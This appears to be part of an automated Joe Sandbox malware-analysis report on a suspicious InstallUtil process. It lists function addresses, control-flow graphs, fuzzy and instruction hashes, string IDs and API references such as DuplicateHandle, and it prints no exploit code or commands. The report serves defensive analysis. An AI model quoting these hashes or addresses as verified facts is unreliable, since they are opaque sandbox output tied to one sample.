                                control_flow_graph 2261 6a3e8f8-6a3e8fa 2262 6a3e901 2261->2262 2263 6a3e8fc-6a3e900 2261->2263 2264 6a3e902 2262->2264 2265 6a3e8e4-6a3e8e9 2262->2265 2263->2262 2266 6a3e903-6a3e906 2264->2266 2267 6a3e909-6a3e90c 2264->2267 2268 6a3e908 2266->2268 2269 6a3e90e 2266->2269 2267->2269 2268->2267 2270 6a3e910-6a3e913 2269->2270 2271 6a3e915-6a3e936 2270->2271 2272 6a3e93b-6a3e93e 2270->2272 2271->2272 2273 6a3e960-6a3e963 2272->2273 2274 6a3e940-6a3e95b 2272->2274 2275 6a3e965 2273->2275 2276 6a3e98b-6a3e98d 2273->2276 2274->2273 2282 6a3e96f 2275->2282 2279 6a3e994-6a3e997 2276->2279 2280 6a3e98f 2276->2280 2279->2270 2281 6a3e99d-6a3e9a1 2279->2281 2280->2279 2285 6a3e977-6a3e986 2282->2285 2285->2276
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 55d6ddf718b5932073770e1805fb1b8b510c74a89327e4a9b2db95db48a6dbb7
                                • Instruction ID: 380d1c8f1b24287d580d8a55dc5950d5b55831cb4d04cd73efaa76e2e6d0542b
                                • Opcode Fuzzy Hash: 55d6ddf718b5932073770e1805fb1b8b510c74a89327e4a9b2db95db48a6dbb7
                                • Instruction Fuzzy Hash: B2118224B002655BDBA5AB7984A435EA7E5F7C6650F14486AF14ACF381E925CC014396
                                Function 06A3E908 Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 4d224ff72bfc19d398abc9c413c9c32dcaf032552b416a4ae1871ae238610d6f
                                • Instruction ID: b7ab715a671e59bfd91f6e802c5492fca0bf151f0dc56872610c6c59c5068058
                                • Opcode Fuzzy Hash: 4d224ff72bfc19d398abc9c413c9c32dcaf032552b416a4ae1871ae238610d6f
                                • Instruction Fuzzy Hash: 1F016234B001255BDFA9AA7D94A476EA2E6FBC5B50F108829F64BCF380ED25DC0147D5
                                Function 030BB398 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030BB41F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 0f8c8976c4dbdb07c7b6cbd74916d09ce2f4a811d73d4a370cbe8e47c71714ed
                                • Instruction ID: b99bd867168017bf107dcbcbd3b67e1f157097615f922661305e8f8f0c7cc3aa
                                • Opcode Fuzzy Hash: 0f8c8976c4dbdb07c7b6cbd74916d09ce2f4a811d73d4a370cbe8e47c71714ed
                                • Instruction Fuzzy Hash: 6121E4B5900249EFDB10CFAAD884ADEFBF8FB48310F14801AE914A3310D378A944CF65
                                Function 030BB390 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030BB41F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d696453f07cfd43e52b661eda2f12333e13dd04d5bfe0585b90535c122fd2802
                                • Instruction ID: 3a8edd271563de414f4e451262c0869e4ec23305a4b3a336f2d5c6f3fad4f791
                                • Opcode Fuzzy Hash: d696453f07cfd43e52b661eda2f12333e13dd04d5bfe0585b90535c122fd2802
                                • Instruction Fuzzy Hash: 6B2112B5D00248DFDB10CFA9D984AEEBBF4FB48310F14842AE918A3310C338A954CFA5
                                Function 06A3A330 Relevance: .2, Instructions: 234COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a80908410f8ea5837564a6b935f62c46b733e43a7bd9060936d8174ba6307d1
                                • Instruction ID: 08acf3f51ceaff0c46260d69258b61cf3efe735a4bfaf2d1d75d38f2a7f254ac
                                • Opcode Fuzzy Hash: 2a80908410f8ea5837564a6b935f62c46b733e43a7bd9060936d8174ba6307d1
                                • Instruction Fuzzy Hash: CB61A172F001214BDB54AB7EC89069FA6D7AFD4260B15447AE90EDB360DE65EC0287D1
                                Function 06A386C9 Relevance: .2, Instructions: 222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4cf05a104131ab0bf974e8aebde9584ddd09259b441d5a49724a0e0eb75fd7f9
                                • Instruction ID: 8b629f1702969eee975d74530e0f2fe5c683b2e6afe75b6cc7a33c94b568a98d
                                • Opcode Fuzzy Hash: 4cf05a104131ab0bf974e8aebde9584ddd09259b441d5a49724a0e0eb75fd7f9
                                • Instruction Fuzzy Hash: 38916D30E1061A8FDF60DF68C850B9DB7B1FF89310F208599E549BB245EB74A985CF91
                                Function 06A386E0 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: badb55c221b9dafb4fe9bb6d2f830363734201f4c9fba5c9736b1fa1b4f97e0d
                                • Instruction ID: 0105d1b5ff6785e023f751ea5b78cbb59297e454d7925d61b330fa559473d068
                                • Opcode Fuzzy Hash: badb55c221b9dafb4fe9bb6d2f830363734201f4c9fba5c9736b1fa1b4f97e0d
                                • Instruction Fuzzy Hash: CD912D34E1061A8BDF60DF68C890B9DB7B1FF89310F208599E549BB345EB70A985CF51
                                Function 06A38C78 Relevance: .2, Instructions: 174COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2c0fda15646619cf1ca5da0009f02e454a52db22625e7c1dd5975b87ff45d4e
                                • Instruction ID: a3b0f6b9f860b0345846c02e4888be8be9cab07b17fe896622d13986cfc0f834
                                • Opcode Fuzzy Hash: a2c0fda15646619cf1ca5da0009f02e454a52db22625e7c1dd5975b87ff45d4e
                                • Instruction Fuzzy Hash: 41518470F002199FDB94ABA5C4547AEBAF6FBC8750F208429E506EB395DE788C018B95
                                Function 06A38C68 Relevance: .1, Instructions: 130COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 394f270aae05d2b5bb57ad4cf4a4f7470c609d23eaf8235fa37b3f32a0c62f0b
                                • Instruction ID: b99c304b219e045b0a526f3d8e1e3903e23a35679aec01c395c0976897331dce
                                • Opcode Fuzzy Hash: 394f270aae05d2b5bb57ad4cf4a4f7470c609d23eaf8235fa37b3f32a0c62f0b
                                • Instruction Fuzzy Hash: 2641A970B002199BEB94ABA4C4247AE7AF7FBC4740F204429E506EF3D4DE789C018B91
                                Function 06A396A1 Relevance: .1, Instructions: 127COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17428ed0b03010175ccccfe9d140049b4b75353c07a4d8a880ac375a2e2cf4d4
                                • Instruction ID: 4e802f19e80e9a78074a44c24b8b24bb6d2f097755be914ed7ca9f9b749e60df
                                • Opcode Fuzzy Hash: 17428ed0b03010175ccccfe9d140049b4b75353c07a4d8a880ac375a2e2cf4d4
                                • Instruction Fuzzy Hash: 27417275E001158BDB64DF69C4C0B7FF7A2FB85310F64892AE11ADB281E674E841CB91
                                Function 06A39538 Relevance: .1, Instructions: 126COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b6fcaace4ec2e5c468cbd8482818d39a435c6202075f578954d2afa4fdbf5fc
                                • Instruction ID: 10d515d7b958ef4dc0ec3a21515dd7650d63ee5d0e87a5132d47e166973b31e2
                                • Opcode Fuzzy Hash: 2b6fcaace4ec2e5c468cbd8482818d39a435c6202075f578954d2afa4fdbf5fc
                                • Instruction Fuzzy Hash: 1D414071E006198FDF70DF99D880AAFF7B2FB85214F10492AE116D7650E371E9898B91
                                Function 06A35F45 Relevance: .1, Instructions: 120COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61ba0a8a52b32169bdb7fa1c0491232d84a3208fbeab23e52fdf484d61def71c
                                • Instruction ID: 3acafefc09b70da500840cf2497b72042133653a54eac6577e93aee0d20bc761
                                • Opcode Fuzzy Hash: 61ba0a8a52b32169bdb7fa1c0491232d84a3208fbeab23e52fdf484d61def71c
                                • Instruction Fuzzy Hash: 6F41D330B002169FDB99AB7895642AF77E7BFCA650F248468E006DF394EE31CC06C795
                                Function 06A35F58 Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c23c91555760ea77c2b44481d35b90a37e8744625ff0caa690bd695565d6c03
                                • Instruction ID: 866a655a0c85f5e51cf9538a9593d7fd6a6ce1864ef568d23d1ac01edc021f4a
                                • Opcode Fuzzy Hash: 7c23c91555760ea77c2b44481d35b90a37e8744625ff0caa690bd695565d6c03
                                • Instruction Fuzzy Hash: C331A130B002169FDB99AB78C5646AE76E7BFCA650F64846CE006DF394EE31CC06C791
                                Function 06A35E08 Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5096a5033d19ffc0af529cd24e9e6fa76cdb73a31ee82c53c15f4801988e51b3
                                • Instruction ID: 03cb56a845d5d07a4b1114b6ae905737cf2c2b6b7ad50cbae793fb7f0970726a
                                • Opcode Fuzzy Hash: 5096a5033d19ffc0af529cd24e9e6fa76cdb73a31ee82c53c15f4801988e51b3
                                • Instruction Fuzzy Hash: F0315235E102558BDB59DF68D45469EB7F2FF89300F24C929E816EB340DB74AC42CB90
                                Function 06A35E18 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5044e2bfe00944ef99b33a034ef250bfea627512b8a2a1446729467de19eae58
                                • Instruction ID: fbc09b99b39c40099b5a468f6575a4e4a7c4d32e82f5ba861bd24cab649ee452
                                • Opcode Fuzzy Hash: 5044e2bfe00944ef99b33a034ef250bfea627512b8a2a1446729467de19eae58
                                • Instruction Fuzzy Hash: 5A316230E102159BDB59DF68D49469EB7F2FF89300F20C929E806EB350DB74AC41CB90
                                Function 0156D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407743347.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 523fd94d6be60e934be317142f9ac54e808dfa0e1ae06b7579998d56373c115e
                                • Instruction ID: 4847b507f1f82b480af96a650d2a0ae1f42774223ce422f6a1ef8e5cc3d9f46f
                                • Opcode Fuzzy Hash: 523fd94d6be60e934be317142f9ac54e808dfa0e1ae06b7579998d56373c115e
                                • Instruction Fuzzy Hash: C2210375604204EFDB15DF64D580B26BBB9FB84324F20C96DD9890F242D33BD446CAA1
                                Function 06A36FB8 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17f7b37d831b23f9c1336676537659f895ec66e906b0f000207132fa4e8a71d5
                                • Instruction ID: eeac355d2574cbd7fa6f21885c092739749972dd9d490d9ff3d661928483a55d
                                • Opcode Fuzzy Hash: 17f7b37d831b23f9c1336676537659f895ec66e906b0f000207132fa4e8a71d5
                                • Instruction Fuzzy Hash: FB214174E002299FCF94EB68D9546DEBBF1EF89310F104569E509EB241EA329944CF94
                                Function 06A37C50 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2aed4d7da8ebb55a09285b37e5e40eaed7b5722b431ac865e20412d6542150f
                                • Instruction ID: bff4b9ffaf7bfadeba0870ffbe8fa6af0509dce0960561b1b0aa647bb1c75e98
                                • Opcode Fuzzy Hash: e2aed4d7da8ebb55a09285b37e5e40eaed7b5722b431ac865e20412d6542150f
                                • Instruction Fuzzy Hash: FE118271B111654FDB98E6B988506BF72FBEBC8660F144479E407EB344EE72DC0187A1
                                Function 06A37EC0 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a70c07146cf5fdcbb9caec75231a4e73ce08ad76143e76e40f7999c3c652d06d
                                • Instruction ID: 92a3958fa54033feb7f6effed9d8e5cb1c16198bcfa1355e786894bb87b22eac
                                • Opcode Fuzzy Hash: a70c07146cf5fdcbb9caec75231a4e73ce08ad76143e76e40f7999c3c652d06d
                                • Instruction Fuzzy Hash: 4111C071B002254FDF61A73C985076ABBD6EBCA710F24842AF50ACB785E965DC028395
                                Function 0156D006 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407743347.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8360832d9f520a3c8dad43b700b8073c2a089a7836da82b68c9a2e2f1003c6cb
                                • Instruction ID: 1553c0f591d9b7bffac44b409d3ca264d6c055555eaf1d9da1c97621e058ba98
                                • Opcode Fuzzy Hash: 8360832d9f520a3c8dad43b700b8073c2a089a7836da82b68c9a2e2f1003c6cb
                                • Instruction Fuzzy Hash: F12183755093809FC702CF24D590715BF71FB46214F28C5DAD8898F267C33A980ACBA2
                                Function 06A37C40 Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62d50a8b72e9d2abdf966f72d9c06960e411f5bcbae99e80bb8fef28c4740552
                                • Instruction ID: 8cebe4246d5bb172ea2012e765348813a56720c3da297594c5e7a5a1735aa2aa
                                • Opcode Fuzzy Hash: 62d50a8b72e9d2abdf966f72d9c06960e411f5bcbae99e80bb8fef28c4740552
                                • Instruction Fuzzy Hash: D5014532B101680BDB88E7B988607EF66EBDBC8661F04007AE10BEB340FE61CC0183D5
                                Function 06A378E1 Relevance: .1, Instructions: 54COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bb02b2f6a8f17f555baeb7662076db105b56c288f9391e5f632867433fa5ba4
                                • Instruction ID: 8b59603e7d02a4aa8adffbb5b4939b486b3032b3c68dd0878b72d52b034d5886
                                • Opcode Fuzzy Hash: 3bb02b2f6a8f17f555baeb7662076db105b56c288f9391e5f632867433fa5ba4
                                • Instruction Fuzzy Hash: 7921C2B5D01259EFCB40DF9AD885ADEFBB4FB48710F10822AE518B7300D374A954CBA5
                                Function 06A378E8 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cae134c9b0a11416470d4898f2a7783bc7c3de9b6eaad608a3fad4aa9f5a935
                                • Instruction ID: aa94ad5d4747c1f651e6980e318a804c2920a3477fecc5207452eb9c63189363
                                • Opcode Fuzzy Hash: 9cae134c9b0a11416470d4898f2a7783bc7c3de9b6eaad608a3fad4aa9f5a935
                                • Instruction Fuzzy Hash: F111C2B5D01259EFCB40DF9AD884ADEFBB4FB48710F10822AE518A7200C374A954CBA5
                                Function 06A37ED0 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfd99763563b0512d6b58b084699f32c6ae8799b0a5c0a433fa1c3cf6c8e2b14
                                • Instruction ID: bce12c0e8c2517357c6727775e9e7152f84e81c408c01347e1619112a1ed3145
                                • Opcode Fuzzy Hash: cfd99763563b0512d6b58b084699f32c6ae8799b0a5c0a433fa1c3cf6c8e2b14
                                • Instruction Fuzzy Hash: DE016D31B005250BDB65A77DA45472BB2DAEBC9710F20883AF60ECB344ED65DC028395
                                Function 06A3C5C3 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6ec818ea5ded700f91a5a090d4a36f308d53d54b5a8c1a74f746173d3cec597
                                • Instruction ID: 06aaf0ea9012dd83124c40a1193fcad640630771927e2f9c4a2b815de970ec49
                                • Opcode Fuzzy Hash: d6ec818ea5ded700f91a5a090d4a36f308d53d54b5a8c1a74f746173d3cec597
                                • Instruction Fuzzy Hash: AE01F731B041259FDFA8BBA89D612BC72E5EBC06A0F14602AE907EF241EF60CD018795
                                Function 0155D628 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407643095.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_155d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0ba181bba970514fd95e126f3b94024342b340d40b428043e9a7fd8bbbe6ed1
                                • Instruction ID: 17ac527c0b40eb8838bc3d4bcbc75732af74478f64fe8c34c279d8954ac9d052
                                • Opcode Fuzzy Hash: d0ba181bba970514fd95e126f3b94024342b340d40b428043e9a7fd8bbbe6ed1
                                • Instruction Fuzzy Hash: 19F0C272404344EAE7108E0AC894B66FFE8EB51624F18C45BED0C0E287C2799845CAB1
                                Function 06A3A5C0 Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ade3362a6133b060bb2318fff63dccee1f092358b2c8243b8dcf90a58486b045
                                • Instruction ID: 4119b9f1cb946ba2b58654612c94157ac302e70b09d5306762ca85ac08d66e07
                                • Opcode Fuzzy Hash: ade3362a6133b060bb2318fff63dccee1f092358b2c8243b8dcf90a58486b045
                                • Instruction Fuzzy Hash: BBF02021E193A8ABDB60EB30890538A3FA88B83214F1548AAF584CF142E571C9058392
                                Function 06A38B61 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9224ffcde71e7254bf9f238bb34dc5d28ed26a03892d668b662e436a87e3d05d
                                • Instruction ID: 71dbe3d4645d9f1f114de269a8ec6e851d7f212d74a53b6e41a055e664527901
                                • Opcode Fuzzy Hash: 9224ffcde71e7254bf9f238bb34dc5d28ed26a03892d668b662e436a87e3d05d
                                • Instruction Fuzzy Hash: 26F0DA70A2012ADFDB64DF90E969BADBBB6BF44710F204119F402AB295CB781C41CB80
                                Function 06A3A5D0 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 066b388eeda43513f39c51ae77f2b31a78f390eb466e3062225e7ca49fac300b
                                • Instruction ID: cc0bd9e829e8987ca546de7da80601439ef039f064958d3d90206a25765d1398
                                • Opcode Fuzzy Hash: 066b388eeda43513f39c51ae77f2b31a78f390eb466e3062225e7ca49fac300b
                                • Instruction Fuzzy Hash: F0E0C270E1022CABDF50EFB4CA4575E73ADD702204F2084A5F548CB200E536CE428780

                                Non-executed Functions

                                Function 06A3B220 Relevance: 10.4, Strings: 8, Instructions: 435COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$/q\-$<q\-$Nq\-$Sq\-$hq\-$q\-$v\-
                                • API String ID: 0-2351465072
                                • Opcode ID: d3ccf2a6ee161d2a53b1436d35ffa6b2855bd5fb9f4ea075a81e16c86017e63f
                                • Instruction ID: 167b95735f9b1dd488ec2dae18d3af765b7d168692dec07b1c4a69c914f2ccef
                                • Opcode Fuzzy Hash: d3ccf2a6ee161d2a53b1436d35ffa6b2855bd5fb9f4ea075a81e16c86017e63f
                                • Instruction Fuzzy Hash: C5F11834B012198FDB98EBB8C4647AEB7F2BFD4740F208429D41A9F795DA309C45CBA1
                                Function 06A3EC80 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,E\-$3E\-$ME\-$SE\-$bE\-$kE\-$yE\-
                                • API String ID: 0-2142556206
                                • Opcode ID: 50b7560ed07ce25b0ce178bea24b2ab871deedb094ca5b1f59bf39e7d88f1998
                                • Instruction ID: 776099238cdf5b48109aded0bfee3071134d412ea7d98c86d722dbb59b38becf
                                • Opcode Fuzzy Hash: 50b7560ed07ce25b0ce178bea24b2ab871deedb094ca5b1f59bf39e7d88f1998
                                • Instruction Fuzzy Hash: C4815574B012159FDB58EBB4E490BAEB6F6BF84650F108429F506EB380EF74EC0187A5
                                Function 06A3CDA0 Relevance: 7.8, Strings: 6, Instructions: 301COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: &B\-$6B\-$@C\-$IC\-$RC\-$kB\-
                                • API String ID: 0-1245943403
                                • Opcode ID: 6d228e6b3178ba6af7214967ce901a4f26547854d77f3b13aa6d2908767bfcb0
                                • Instruction ID: 0419414006e6e98d7e0aa2782d4da29e19119f79c8d0d66bfac2b9fc1a2f07d8
                                • Opcode Fuzzy Hash: 6d228e6b3178ba6af7214967ce901a4f26547854d77f3b13aa6d2908767bfcb0
                                • Instruction Fuzzy Hash: 7BC12130F012598FDB58EB74C850BAEB6F2BFC9640F1045A9D40AEB355EE319D81CB91
                                Function 06A3E668 Relevance: 7.7, Strings: 6, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
